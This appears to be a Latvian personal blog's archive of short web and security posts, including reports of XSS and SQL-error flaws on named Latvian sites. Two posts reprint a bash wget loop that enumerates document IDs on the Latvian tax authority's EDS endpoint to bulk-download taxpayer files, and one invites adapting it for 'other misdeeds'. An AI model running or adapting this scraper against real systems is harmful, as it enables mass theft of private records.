Tag Archives: Web

Bezmaksas web kurss, par WEB

Posted on aprīlis 24, 2012 | Leave a comment

Daudzsološs Virdžīnijas universitātes bezmaksas kurs par web un kā tas darbojas.
Pirmā nodaļa izskatās pēc satura daudzsološa.

http://www.udacity.com/overview/Course/cs253/CourseRev/apr2012

→ Leave a comment

Posted in Apmācība, How to, Interesanti, Kopums, Python, Web

Tagged , , , ,

WEB fontu piemēri

Posted on februāris 26, 2012 | Leave a comment

16 fontu izskats:

http://www.webdesigndev.com/web-development/16-gorgeous-web-safe-fonts-to-use-with-css

→ Leave a comment

Posted in Web

Tagged , , ,

WEB skype beidzot pieejams grupu čats

Posted on jūlijs 1, 2011 | Leave a comment

Diezgan sen sekoju projekta https://imo.im attīstībai.
Projekts laika gaitā ir baigi modernizējies un šodien pamanīju, ka novērsuši lielāko mīnusu- nebija pieejams grupu čats.
Projekta izmaiņas, kopš to lietoju:

  • Parādījās sarakstes vēsture
  • Profila bildes
  • Grupu čats

Kāda vēl fīča tiks iestrādāta web skype?

→ Leave a comment

Posted in Interesanti, Kopums, Web

Tagged , , ,

Kapitals.lv

Posted on februāris 19, 2011 | Leave a comment

Šodien kapitals.lv mājas lapa satura vietā izvada datubāzes kļūdu. Šāda lieta viņiem jau gadījās ātrāk.

→ Leave a comment

Posted in Drošība, Interesanti, Kopums, Web

Tagged , , , , , ,

User friendly url

Posted on februāris 7, 2011 | Leave a comment

Ir elegants veids kā izveidot lietotājam draudzīgu url pat gadījumā, ja mājas lapas CRM to nepieļauj un nav iespējams veikt izmaiņas servera konfigurācijā (uzstādīt server side redirection ar .htaccess vai .config).
Piemēram, ja ir lapa, kura neuztur lietotājam draudzīgus url- http://kautkas.lv/?i=3 un ir nepieciešams, lai adrese izskatītos- http://kautkas.lv/atrodi-sevi/
Tad to var izdarīt izveidojot direktoriju atrodi-sevi un tajā ievietojot failu index.php ar saturu:
<blockquote><code>
<HTML>
<HEAD>
<META HTTP-EQUIV=”refresh” CONTENT=”0;URL=http://kautkas.lv/?i=3″>
</HEAD>
<BODY>
</BODY>
</HTML></code> </blockquote>

Jāatceras, ka šāda adrese ir tikai lietotājiem draudzīga, nevis meklētājiem.

→ Leave a comment

Posted in How to, Interesanti, Kopums, PHP, Web

Tagged , ,

www.zz.lv un XSS

Posted on janvāris 17, 2011 | 1 Comment

Mājās drusku pabakstoties atklājās, ka Zemgales ziņas mājas lapas meklēšanas funkcionalitātē ir XSS ievainojamība. Pieņemu, ka tāda pati problēma ir visās AS Dienas reģionālo avīžu mājas lapās.
Pilnībā atvēzēties liedz tas, ka tiek atfiltrēts „=” simbols.
Par XSS var palasīt:

http://hakipedia.com/index.php/Cross_Site_Scripting
http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
http://ha.ckers.org/xss.html
http://www.martani.net/2009/08/xss-steal-passwords-using-javascript.html

→ 1 Comment

Posted in Drošība, Drošības caurumi, Interesanti, Kopums, PHP

Tagged , , , , , , , , , ,

Mainīgo apstrādes kļūda

Posted on janvāris 10, 2011 | 2 Comments

Intereses vadīts pamēģināju paspēlēties ar vienas mājaslapas mainīgajiem.
Joka pēc sāku ar direktorijas satura iegūšanu “directory listing” – viss kārtībā.

Nākamais solis ievadīt kaut ko ačgārnu, piemēram, www.lapa.tepat/css/abrakadabra, no kura normālā gadījumā vaajdzētu notikt redirektam uz lapas sākumu. Tā vietā man izvada šādu paziņojumu:

Source izksatā,tas izkatās sparotamāk:

Ko tas šinī konkrētā gadījumā dod un ko es varu ar to iesākt?
Konkrētā gadījumā neko daudz, tomēr tas norāda uz to, ka mājaslapā nav par visu padomāts un iespējams ir atstātas vēl kādas kļūdas par kurām netika padomāts. Tāpēc iespējams pameklējot dziļāk var atrast vēl šo un to.

Kļūdu paziņojumā bija vēl viena interesanta lieta-
Izvades teksts līdzīgs šim- “Autorizētiem lietotājiem pieejama daudz plašāka informācija, tajā skaitā ģeogrāfiskā GPS izsekošana” un tas mājaslapā, kuras uzdevums nav nodarboties ar kravas loģistiku.
Tā kā iespējams ir neuzmanīgi izmantotas iestrādes no citiem projektiem.
Google gan meklējot pēc šāda teksta nekas netika atrasts.

Manuprāt šeit kļūda ir tajā, ka pirmais mainīgais sakrita ar direktorijas nosaukumu un līdz ar to notika kļūda mainīgo apstrādē. Par to liecina arī tas, ka ievadot citu direktoriju nosaukumus kļūda ir tāda pati, piemēram http://lapa.aa/images/abrakadabra.

Ko no tā var mācīties?-
Mainīgo pirmapstrādes mehānismā jāparedz gadījums, ka tie var sakrist ar direktoriju nosaukumu.

Vai es neesmu pieļāvis šādu kļūdu kādreiz? Iespējams esmu un tāpēc par kļūdām ir jārunā, lai tās vairs neatkārtotos.

→ 2 Comments

Posted in Kopums

Tagged , , , ,

www.atlaizuklubs.lv SQL kļūda

Posted on decembris 29, 2010 | 3 Comments

Šorīt apmeklējot www.atlaizuklubs.lv atklājās medusmaize- SQL kļūdas paziņojums no kuras var izsecināt daļu no datubāzes uzbūves.
Pēc visa spriežot uz servera aptrūkās vieta.
Konkrētā gadījumā izskatās pēc divām klasiskām kļūdām:
1. Nav atslēgta kļūdu izvadīšana (nepieciešama izstrādes posmā, bet ne produkcijas serveros).
2. Un nebija uzstādīts servera disk space monitorings (alerts).

→ 3 Comments

Posted in Drošība, Drošības caurumi, How to, Interesanti, Kopums, SQL, Web

Tagged , , , , , , , , ,

Publisks cron serveris?

Posted on decembris 27, 2010 | 3 Comments

Vai kāds zina kādu publisku cron serveri, kas ļautu ar noteiktu regularitāti izsaukt kādu WEB lapu?
Mēģināju atrast google.com, bet neizdevās, varbūt kāds var pateikt?

→ 3 Comments

Posted in How to, Interesanti, Kopums, PHP

Tagged ,

Ar igtrade.lv noticis nesmukums

Posted on novembris 28, 2010 | 2 Comments

Klejojot par internetu un meklējot ceļojumus iegāju igtrade.lv lapā. No google.com piedāvātā linka izskatās, ka kādreiz bija joomla, bet tagad…
Piefiksēšu vēsturei. Continue reading

→ 2 Comments

Posted in Drošības caurumi

Tagged , , , , , , , , , ,

Bezmaksas hostings

Posted on augusts 12, 2010 | 1 Comment

Nejauši uzskrēju vienam bezmaksas hostingam zumic.com. Pats viņu neesmu testējis, bet lasītās atsauksmes bija tīri neko.

Cerams kādam noderēs.

→ 1 Comment

Posted in Interesanti, Kopums, Web

Tagged , , ,

Mēģinām pielietot EDS konstatēto ievainojamību citur

Posted on augusts 10, 2010 | 3 Comments

Visiem tagad ir zināms kādā veidā tika iegūti dati no EDS sistēmas- nebija (it kā bija iestrādāta, bet testu rezultātā tika atslēgta) autentifikācija uz failu nolādes.

Kā šādu ievainojamību var izmantot tehniski biju atradis netā un pārpublicēju šeit.

Tā kā teorija un citu piemēri no prakses atšķiras, tad nodomāju patestēt.

Linux gadījumā tas varētu izskatīties šādā veidā:

for i in {1..7500000}; do
wget http://www2.vid.gov.lv/eds/Pages/GetDuf.aspx?id=$i;
done

Continue reading

→ 3 Comments

Posted in Drošība, How to, Interesanti, Kopums, Linux, Web, Windows

Tagged , , , , , , , , , , ,

Pods izsmiets vai vēsture atkārtojas

Posted on augusts 6, 2010 | 10 Comments

Tiko uzrakstīju post par boot izsmiešanu un gribas palasīt ko citu.

Un te seko nākamais pārsteigums- pods izsmiets.

Nu ko vēsture atkārtojas..

Pods jau vienreiz tika nonests un cik atceros toreiz autoram bija paša radīts brīnums, bez rezerves kopijām. Tagad Pods griežas(zās) uz wordpress- vai bija mācība un ir rezerves kopija uzzināsim visai drīz.

Man pašam arī pāris mēnešus atpakaļ bija nonests wordpress izmantojot wordpress ievainojamību. Kas par iemeslu bija iekš pods.lv būs interesanti noskaidrot un cerams autors neturēs sveci zem pūra. Varbūt nebija atjaunota pēdējā versija, varbūt kaut kas cits.

Iekš LV ik pa laikam kāda lapa tiek nonesta, taču neesmu dzirdējis ne par vienu sekmīgi pabeigtu izmeklēšanu un notiesājošu spriedumu. Gaidu precedentu, lai tīņi urķi nobītos un beigtu bojāt citiem garastāvokli.

Uzstādīts arī interesants redirekts uz www.kuce.lv, kas liek domāt, ka vainīgais mitinās iekš LV

No sava Hackera neaizbēgsi :) .

→ 10 Comments

Posted in Drošība, Drošības caurumi, Interesanti, Kopums, Web, Wordpress

Tagged , , , , , , , ,

Boot bīstama lapa vai arī boot ticis izsmiets

Posted on augusts 6, 2010 | Leave a comment

Atnākot mājās pēc vakara wake brauciena izdomāju palasīt, kas jauns noticis pasaulē.
Viss sākas ar google reader atvēršanu un tur mani sagaida brīdinājums- boot ir kaitīga lapa.

Palika interesanti..
Lasu tālāk iekš boot, ka ļaundari ir izmantojuši kādu openx ievainojamību un mājaslapā ievietojuši ļaundabīgu kodu, bet tagad viss ir ticis sakopts.

Būtu interesanti, ja Boot būtu nopublicējis kā viss tas notika un kādā veidā un ko ļaundari tieši ievietojuši un no kādām adresēm. Būtu labs un pamācošs rakstiņš.

Zelta teiciens sevi attaisno- No sava Hackera neizbēksi, tāpēc taisām rezerves kopijas :)

→ Leave a comment

Posted in Drošība, Drošības caurumi, Interesanti, Kopums, Web

Tagged , , , , , ,

Kā tika nolādēti dati no VID EDS sistēmas?

Posted on augusts 4, 2010 | 1 Comment

Šodien klejojot par netu atradu veidu kā iespējams tika nopumpēti dati no EDS sistēmas.
Viss ģeniālais ir vienkāršs un lai cilvēki redzētu cik tieši tas ir vienkārši tad pārpublicēju pašu kodu, kas varēja izskatīties aptuveni šāds:
Linux veidīgā konsolē uzrakstām un priecājamies

for i in {1..7500000}; do
wget http://www2.vid.gov.lv/eds/Pages/GetDuf.aspx?id=$i;
done

Šis piemērs parāda veidu kādā šādas ievainojamības izmantot un attiecīgi modificējot piedzīt arī citiem nedarbiem.

→ 1 Comment

Posted in Drošība, How to, Interesanti, Kopums, Linux, Web

Tagged , , , , , ,